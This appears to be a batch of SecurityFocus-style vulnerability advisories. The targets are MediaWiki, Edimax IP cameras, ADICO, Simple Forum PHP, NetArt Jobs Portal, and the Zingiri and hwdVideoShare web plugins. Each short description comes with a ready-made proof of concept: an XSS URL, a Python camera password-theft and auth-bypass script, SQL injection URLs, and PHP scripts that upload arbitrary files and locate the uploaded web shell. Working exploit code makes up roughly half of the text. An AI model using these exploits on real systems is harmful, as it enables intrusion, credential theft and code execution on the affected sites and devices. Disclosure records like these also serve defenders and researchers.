An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable.
http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27
source: https://www.securityfocus.com/bid/54006/info
Edimax IC-3030iWn is prone to an information-disclosure vulnerability.
Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.
#!/usr/bin/env python
"""
# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
# Date: 4 April 2012
# Exploit Author: y3dips@echo.or.id, @y3dips
# URL: http://echo.or.id
# Vendor Homepage: http://www.edimax.com
# Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91
# Also Tested on:
- Edimax IC-3015
- Airlive WN 500
# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
# To successfully automate your browser launch, change browser path.
"""
import socket
import webbrowser
import sys
if len(sys.argv) != 2:
print "Eg: ./edimaxpwned.py edimax-IP"
sys.exit(1)
port=13364
target= sys.argv[1]
def read_pw(target, port):
devmac = "\xff\xff\xff\xff\xff\xff"
code="\x00\x06\xff\xf9" #for unicast reply
data=devmac+code
sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.connect((target,port))
try:
sock.send(data)
sock.settimeout(5)
tmp = sock.recv(4096)
return tmp
except socket.timeout:
return None
def pwned_edi():
data=read_pw(target, port)
if data != None:
data=data[365:377]
pw=data.strip("\x00")
webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp')
else:
print "Socket timeOut or not Vulnerable"
pwned_edi()
source: https://www.securityfocus.com/bid/54023/info
ADICO is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ADICO 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/car-rent/[PATH]/admin/index.php?job=cars&action=edit&id=[SQL INJECTION]
http://www.example.com/car-rent/[PATH]/admin/index.php?job=calendar&action=month&id=[SQL INJECTION]
source: https://www.securityfocus.com/bid/54020/info
Zingiri Web Shop plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Zingiri Web Shop 2.4.3 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/&action=save");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('fh'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/54024/info
Simple Forum PHP is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Simple Forum PHP 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/cms/forum.php?p=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum.php?orderType=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum.php?orderType=[ASC/DESC]&orderBy=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=topics&orderType=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=topics&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=-1 [SQL-INJECTION]--
http://www.example.com/cms/forum/admin.php?act=replies&topic_id=&orderType=[ASC/DESC]&search=&orderBy=-1 [SQL-INJECTION]--
source: https://www.securityfocus.com/bid/54026/info
NetArt Media Jobs Portal is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
NetArt Media Jobs Portal 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/EMPLOYERS/index.php?category=application_management&folder=my&page=details&posting_id=113&apply_id=68+order+%20by+1--%20[SQL INJECTION]--
source: https://www.securityfocus.com/bid/54037/info
The hwdVideoShare component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
hwdVideoShare r805 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php.vob";
$ch =
curl_init("http://www.example.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
echo "<br />";
$i = 0;
for ($i=1;$i<9999;$i++)
{
$n = 4;
$num = str_pad((int) $i,$n,"0",STR_PAD_LEFT);
$filename = date('YmdH').$num.$uploadfile;
$url = "http://www.exemple.com/tmp/".$filename;
$c = curl_init("$url");
$postResult2 = curl_exec($c);
$info = curl_getinfo($c);
$httpcode = $info['http_code'];
if($httpcode == 200){
echo $url;
curl_close($c);
exit;
}
}
?>